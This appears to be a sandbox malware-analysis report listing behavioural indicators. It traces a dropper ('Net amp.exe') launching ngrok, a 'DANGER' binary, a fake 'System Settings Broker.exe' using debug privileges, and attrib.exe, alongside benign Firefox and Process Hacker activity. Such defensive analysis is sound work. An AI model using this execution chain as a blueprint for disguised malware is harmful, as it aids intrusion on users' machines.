File opened for modification C:\Program Files\Process Hacker 2\plugins\DotNetTools.dll C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp N/A
File opened for modification C:\Program Files\Process Hacker 2\plugins\ExtendedTools.dll C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp N/A
File created C:\Program Files\Process Hacker 2\is-GEIAF.tmp C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp N/A
File created C:\Program Files\Process Hacker 2\x86\plugins\is-U2Q8J.tmp C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp N/A
File created C:\Program Files\Process Hacker 2\plugins\is-CFSGE.tmp C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp N/A
File created C:\Program Files\Process Hacker 2\plugins\is-POG13.tmp C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp N/A
File opened for modification C:\Program Files\Process Hacker 2\plugins\NetworkTools.dll C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp N/A
File opened for modification C:\Program Files\Process Hacker 2\x86\plugins\DotNetTools.dll C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp N/A
File created C:\Program Files\Process Hacker 2\is-0K6PF.tmp C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp N/A
File created C:\Program Files\Process Hacker 2\is-SUFKA.tmp C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp N/A
File created C:\Program Files\Process Hacker 2\is-P5MF8.tmp C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp N/A
File created C:\Program Files\Process Hacker 2\plugins\is-CD30M.tmp C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp N/A
File created C:\Program Files\Process Hacker 2\plugins\is-L471S.tmp C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp N/A
File created C:\Program Files\Process Hacker 2\is-4SRG2.tmp C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp N/A
File created C:\Program Files\Process Hacker 2\is-EG2AC.tmp C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp N/A
File created C:\Program Files\Process Hacker 2\plugins\is-FK9K5.tmp C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp N/A
File created C:\Program Files\Process Hacker 2\is-BIA04.tmp C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp N/A
File created C:\Program Files\Process Hacker 2\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp N/A
File created C:\Program Files\Process Hacker 2\plugins\is-MBAFR.tmp C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp N/A
File created C:\Program Files\Process Hacker 2\plugins\is-B168P.tmp C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A

Collects information from the system

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

NTFS ADS

Description Indicator Process Target
File created C:\Users\Admin\Downloads\Creative EAX Settings.exe:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
File created C:\Users\Admin\Downloads\processhacker-2.39-setup.exe:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
File created C:\Users\Admin\Downloads\processhacker-2.39-setup(1).exe:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ngrok.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ngrok.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ngrok.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ngrok.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-J209T.tmp\processhacker-2.39-setup.tmp N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A
N/A N/A C:\Program Files\Process Hacker 2\ProcessHacker.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3484 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\Net amp.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ngrok.exe
PID 3484 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\Net amp.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ngrok.exe
PID 3484 wrote to memory of 3640 N/A C:\Users\Admin\AppData\Local\Temp\Net amp.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\DANGER~1.EXE
PID 3484 wrote to memory of 3640 N/A C:\Users\Admin\AppData\Local\Temp\Net amp.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\DANGER~1.EXE
PID 3484 wrote to memory of 3640 N/A C:\Users\Admin\AppData\Local\Temp\Net amp.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\DANGER~1.EXE
PID 3640 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\DANGER~1.EXE C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe
PID 3640 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\DANGER~1.EXE C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe
PID 3640 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\DANGER~1.EXE C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe
PID 3640 wrote to memory of 3904 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\DANGER~1.EXE C:\Windows\SysWOW64\attrib.exe
PID 3640 wrote to memory of 3904 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\DANGER~1.EXE C:\Windows\SysWOW64\attrib.exe
PID 3640 wrote to memory of 3904 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\DANGER~1.EXE C:\Windows\SysWOW64\attrib.exe
PID 2660 wrote to memory of 3476 N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe C:\Windows\SysWOW64\attrib.exe
PID 2660 wrote to memory of 3476 N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe C:\Windows\SysWOW64\attrib.exe
PID 2660 wrote to memory of 3476 N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe C:\Windows\SysWOW64\attrib.exe
PID 2660 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe C:\Windows\SysWOW64\attrib.exe
PID 2660 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe C:\Windows\SysWOW64\attrib.exe
PID 2660 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe C:\Windows\SysWOW64\attrib.exe
PID 4424 wrote to memory of 3116 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4424 wrote to memory of 3116 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4424 wrote to memory of 3116 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4424 wrote to memory of 3116 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
